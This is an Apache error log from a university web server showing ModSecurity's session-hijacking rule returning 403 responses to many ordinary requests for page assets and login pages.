[Mon Aug 28 08:57:57.609537 2023] [:error] [pid 38726] [client 125.164.16.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv-JcCo-f0AAJdGkjAAAAAF"]
[Mon Aug 28 08:57:57.613329 2023] [:error] [pid 38648] [client 125.164.22.227] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv-JcCo-f0AAJb4sZgAAAAL"]
[Mon Aug 28 08:57:57.613739 2023] [:error] [pid 38646] [client 125.164.16.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv-JcCo-f0AAJb21FEAAAAB"]
[Mon Aug 28 08:57:57.616045 2023] [:error] [pid 38686] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv-JcCo-f0AAJceGPcAAAAA"]
[Mon Aug 28 08:57:57.622700 2023] [:error] [pid 38764] [client 125.164.17.125] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv-JcCo-f0AAJdscJ0AAAAM"]
[Mon Aug 28 08:57:57.704063 2023] [:error] [pid 38726] [client 125.164.20.190] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-JcCo-f0AAJdGkjEAAAAF"]
[Mon Aug 28 08:58:00.618638 2023] [:error] [pid 38646] [client 125.164.17.125] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-KMCo-f0AAJb21FIAAAAB"]
[Mon Aug 28 08:58:00.691190 2023] [:error] [pid 38764] [client 125.164.23.50] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-KMCo-f0AAJdscJ8AAAAM"]
[Mon Aug 28 08:58:03.313597 2023] [:error] [pid 38726] [client 125.164.20.190] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-K8Co-f0AAJdGkjQAAAAF"]
[Mon Aug 28 08:58:03.377537 2023] [:error] [pid 38764] [client 125.164.16.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-K8Co-f0AAJdscKEAAAAM"]
[Mon Aug 28 08:58:03.802642 2023] [:error] [pid 38688] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv-K8Co-f0AAJcg6eoAAAAD"]
[Mon Aug 28 08:58:04.195098 2023] [:error] [pid 38641] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-LMCo-f0AAJbxpCAAAAAJ"]
[Mon Aug 28 08:58:04.340579 2023] [:error] [pid 38726] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-LMCo-f0AAJdGkjUAAAAF"]
[Mon Aug 28 08:58:04.495643 2023] [:error] [pid 38688] [client 125.164.19.9] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-LMCo-f0AAJcg6esAAAAD"]
[Mon Aug 28 08:58:05.928092 2023] [:error] [pid 38726] [client 125.164.16.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-LcCo-f0AAJdGkjYAAAAF"]
[Mon Aug 28 08:58:06.001565 2023] [:error] [pid 38114] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-LsCo-f0AAJTiomEAAAAE"]
[Mon Aug 28 08:58:06.066954 2023] [:error] [pid 38641] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv-LsCo-f0AAJbxpCEAAAAJ"]
[Mon Aug 28 08:58:06.536866 2023] [:error] [pid 38763] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-LsCo-f0AAJdrnmEAAAAK"]
[Mon Aug 28 08:58:11.847028 2023] [:error] [pid 38641] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv-M8Co-f0AAJbxpCMAAAAJ"]
[Mon Aug 28 08:58:12.227471 2023] [:error] [pid 38641] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-NMCo-f0AAJbxpCQAAAAJ"]
[Mon Aug 28 08:58:26.764967 2023] [:error] [pid 38688] [client 125.164.17.125] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-QsCo-f0AAJcg6e8AAAAD"]
[Mon Aug 28 08:58:26.911332 2023] [:error] [pid 38647] [client 125.164.17.125] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-QsCo-f0AAJb3RckAAAAH"]
[Mon Aug 28 09:01:07.687378 2023] [:error] [pid 38773] [client 52.167.144.173] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv-48Co-f0AAJd1fnsAAAAE"]
[Mon Aug 28 09:02:50.584955 2023] [:error] [pid 38688] [client 114.5.212.48] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOwASsCo-f0AAJcg6f8AAAAD"]
[Mon Aug 28 09:02:50.908223 2023] [:error] [pid 38774] [client 114.5.212.48] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwASsCo-f0AAJd2kc8AAAAH"]
[Mon Aug 28 09:03:04.499381 2023] [:error] [pid 38727] [client 114.5.212.48] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOwAWMCo-f0AAJdH0EcAAAAI"]
[Mon Aug 28 09:03:04.625189 2023] [:error] [pid 38772] [client 114.5.212.48] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwAWMCo-f0AAJd0nlEAAAAC"]
[Mon Aug 28 09:03:18.507971 2023] [:error] [pid 38727] [client 114.5.212.48] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOwAZsCo-f0AAJdH0EgAAAAI"]
[Mon Aug 28 09:03:18.619165 2023] [:error] [pid 38772] [client 114.5.212.48] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwAZsCo-f0AAJd0nlIAAAAC"]
[Mon Aug 28 09:04:20.293386 2023] [:error] [pid 38773] [client 125.164.23.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOwApMCo-f0AAJd1fn0AAAAE"]
[Mon Aug 28 09:04:26.220859 2023] [:error] [pid 38683] [client 125.164.21.120] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOwAqsCo-f0AAJcb5AEAAAAP"]
[Mon Aug 28 09:04:44.113049 2023] [:error] [pid 38772] [client 125.164.19.245] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOwAvMCo-f0AAJd0nlMAAAAC"]
[Mon Aug 28 09:04:45.111622 2023] [:error] [pid 38765] [client 125.164.19.22] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOwAvcCo-f0AAJdtodAAAAAO"]
[Mon Aug 28 09:04:45.113106 2023] [:error] [pid 38772] [client 125.164.20.185] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwAvcCo-f0AAJd0nlQAAAAC"]
[Mon Aug 28 09:04:45.179860 2023] [:error] [pid 38774] [client 125.164.23.90] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOwAvcCo-f0AAJd2kdAAAAAH"]
[Mon Aug 28 09:04:45.183393 2023] [:error] [pid 38646] [client 125.164.20.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOwAvcCo-f0AAJb21F0AAAAB"]
[Mon Aug 28 09:04:45.185262 2023] [:error] [pid 38769] [client 125.164.16.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOwAvcCo-f0AAJdxrTIAAAAS"]
[Mon Aug 28 09:04:45.188022 2023] [:error] [pid 38727] [client 125.164.16.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOwAvcCo-f0AAJdH0EoAAAAI"]
[Mon Aug 28 09:04:45.190177 2023] [:error] [pid 38688] [client 125.164.19.22] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOwAvcCo-f0AAJcg6gEAAAAD"]
[Mon Aug 28 09:04:45.218846 2023] [:error] [pid 38683] [client 125.164.20.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOwAvcCo-f0AAJcb5AIAAAAP"]
[Mon Aug 28 09:04:45.220841 2023] [:error] [pid 38774] [client 125.164.16.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOwAvcCo-f0AAJd2kdEAAAAH"]
[Mon Aug 28 09:04:45.223588 2023] [:error] [pid 38688] [client 125.164.23.90] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOwAvcCo-f0AAJcg6gIAAAAD"]
[Mon Aug 28 09:04:45.243786 2023] [:error] [pid 38727] [client 125.164.17.201] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOwAvcCo-f0AAJdH0EsAAAAI"]
[Mon Aug 28 09:04:45.270506 2023] [:error] [pid 38646] [client 125.164.16.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOwAvcCo-f0AAJb21F4AAAAB"]
[Mon Aug 28 09:04:45.273034 2023] [:error] [pid 38773] [client 125.164.16.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOwAvcCo-f0AAJd1fn8AAAAE"]
[Mon Aug 28 09:04:45.366190 2023] [:error] [pid 38774] [client 125.164.17.201] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOwAvcCo-f0AAJd2kdIAAAAH"]
[Mon Aug 28 09:04:45.391253 2023] [:error] [pid 38769] [client 125.164.19.22] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOwAvcCo-f0AAJdxrTMAAAAS"]
[Mon Aug 28 09:04:45.424134 2023] [:error] [pid 38683] [client 125.164.20.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOwAvcCo-f0AAJcb5AMAAAAP"]
[Mon Aug 28 09:04:45.447532 2023] [:error] [pid 38771] [client 125.164.16.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOwAvcCo-f0AAJdzkLgAAAAU"]
[Mon Aug 28 09:04:45.469500 2023] [:error] [pid 38646] [client 125.164.17.201] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOwAvcCo-f0AAJb21F8AAAAB"]
[Mon Aug 28 09:04:45.476456 2023] [:error] [pid 38769] [client 125.164.20.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOwAvcCo-f0AAJdxrTQAAAAS"]
[Mon Aug 28 09:04:45.477551 2023] [:error] [pid 38773] [client 125.164.20.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOwAvcCo-f0AAJd1foAAAAAE"]
[Mon Aug 28 09:04:45.481369 2023] [:error] [pid 38774] [client 125.164.23.90] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOwAvcCo-f0AAJd2kdMAAAAH"]
[Mon Aug 28 09:04:45.493484 2023] [:error] [pid 38771] [client 125.164.20.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOwAvcCo-f0AAJdzkLkAAAAU"]
[Mon Aug 28 09:04:45.496423 2023] [:error] [pid 38769] [client 125.164.20.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOwAvcCo-f0AAJdxrTUAAAAS"]
[Mon Aug 28 09:04:45.502864 2023] [:error] [pid 38727] [client 125.164.23.90] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOwAvcCo-f0AAJdH0EwAAAAI"]
[Mon Aug 28 09:04:45.519514 2023] [:error] [pid 38774] [client 125.164.19.22] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOwAvcCo-f0AAJd2kdQAAAAH"]
[Mon Aug 28 09:04:45.534702 2023] [:error] [pid 38771] [client 125.164.23.90] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOwAvcCo-f0AAJdzkLoAAAAU"]
[Mon Aug 28 09:04:45.596765 2023] [:error] [pid 38765] [client 125.164.21.92] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOwAvcCo-f0AAJdtodEAAAAO"]
[Mon Aug 28 09:04:45.623321 2023] [:error] [pid 38683] [client 125.164.16.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOwAvcCo-f0AAJcb5AQAAAAP"]
[Mon Aug 28 09:04:45.682860 2023] [:error] [pid 38769] [client 125.164.18.121] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwAvcCo-f0AAJdxrTYAAAAS"]
[Mon Aug 28 09:04:59.527633 2023] [:error] [pid 38773] [client 125.164.19.245] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOwAy8Co-f0AAJd1foEAAAAE"]
[Mon Aug 28 09:06:13.636060 2023] [:error] [pid 38765] [client 114.122.110.173] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "tpa-online.unla.ac.id"] [uri "/auth"] [unique_id "ZOwBFcCo-f0AAJdtodUAAAAO"]
